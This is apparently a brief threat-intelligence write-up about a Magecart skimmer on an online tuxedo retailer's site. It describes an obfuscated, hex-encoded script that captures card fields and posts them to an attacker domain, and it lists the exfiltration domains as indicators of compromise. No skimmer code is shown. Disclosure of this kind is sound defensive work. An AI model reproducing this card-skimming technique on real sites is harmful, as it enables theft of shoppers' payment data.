Online tuxedo retailer compromised by Magecart theft group
The externally located script performs Magecart’s main data theft function and is obfuscated, with a larger portion of it being hex encoded.
Decoding this script reveals the following:
Shown above: De-obfuscated script used to skim credit card information pointing to the domain www.msecurely.com. This form looks for specific input fields and captures the data, submitting it over HTTPS via a POST request to the URL www.msecurely.com/checkout/onepage/
INDICATORS OF COMPROMISE:
encoderform.com – Domain hosted by credit card theft group
www.msecurely.com – POST /checkout/onepage/ – Domain hosted by credit card theft group